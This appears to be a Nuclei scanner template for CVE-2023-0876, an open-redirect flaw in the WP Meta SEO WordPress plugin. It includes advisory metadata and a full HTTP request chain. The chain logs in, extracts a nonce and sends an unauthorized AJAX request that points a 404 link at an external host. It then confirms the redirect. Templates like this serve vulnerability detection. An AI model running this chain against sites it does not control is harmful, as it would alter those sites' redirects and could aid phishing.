id: CVE-2023-0876 info: name: WordPress Meta SEO <= 4.5.2 - Open Redirect author: Khalid6468 severity: medium description: | The WP Meta SEO WordPress plugin before 4.5.3 did not authorize several AJAX actions, which allowed low-privilege users to update certain data and resulted in an arbitrary redirect vulnerability. impact: | Authenticated attackers with low privileges can exploit unauthorized AJAX actions to update link redirects and create arbitrary redirect vulnerabilities that could be used for phishing attacks. remediation: | Update the plugin to version 4.5.3 or later to fix the arbitrary redirect vulnerability. reference: - https://wpscan.com/vulnerability/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea/ - https://api.first.org/data/v1/epss?cve=CVE-2023-0876&pretty=true classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0876 cwe-id: CWE-601 epss-score: 0.02301 epss-percentile: 0.8502 cpe: cpe:2.3:a:joomunited:wp_meta_seo:*:*:*:*:*:wordpress:*:* metadata: verified: true fofa-query: body="/wp-content/plugins/wp-meta-seo/" vendor: joomunited product: wp_meta_seo framework: wordpress tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,wp-meta-seo,redirect,vkev,vuln variables: link_endpoint: "{{rand_text_numeric(5)}}" redirect_url: "https://oast.me" flow: http(1) || http(2) && http(3) && http(4) && http(5) && http(6) http: - raw: - | GET /wp-content/plugins/wp-meta-seo/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "status_code == 200" - compare_versions(version, '<= 4.5.2') condition: and extractors: - type: regex part: body name: version group: 1 regex: - 'Stable tag: ([0-9.]+)' internal: true - raw: - | GET /?p={{link_endpoint}} HTTP/1.1 Host: {{Hostname}} redirects: true matchers: - type: dsl dsl: - "status_code == 404" internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In matchers: - type: dsl dsl: - 'status_code == 302 || status_code == 200' - 'contains(header, "wordpress_logged_in")' condition: and internal: true - raw: - | GET /wp-admin/ HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "status_code == 200" - "contains(body, 'wpms_nonce')" condition: and internal: true extractors: - type: regex name: wpms_nonce group: 1 regex: - 'wpms_nonce.*?([0-9a-z]+)' part: body internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=wpms&wpms_nonce={{wpms_nonce}}&task=update_link_redirect&link_id={{link_id}}&link_redirect={{redirect_url}} #The WP Meta SEO plugin automatically created entries in the wp_wpms_links table for 404 pages, with the link_id field stored in this DB table. This link_id input was required to validate the redirection. matchers: - type: dsl dsl: - "status_code == 200" - "contains_any(body, 'status', 'contains','success', 'updated','redirect')" condition: and internal: true - raw: - | GET /?p={{link_endpoint}} HTTP/1.1 Host: {{Hostname}} redirects: false max-redirects: 0 matchers: - type: dsl dsl: - "status_code == 302" - 'contains(header, "Location: {{redirect_url}}")' condition: and # digest: 4a0a00473045022027e0074cdaa49b748035c44732165d2061244db0cf72d5c9d58d170f5d856e2e022100973e0566ea432f8d8f20b0580d5869cfd7421b52d9a268d71dc86a84fc749e56:922c64590222798bb761d5b6d8e72950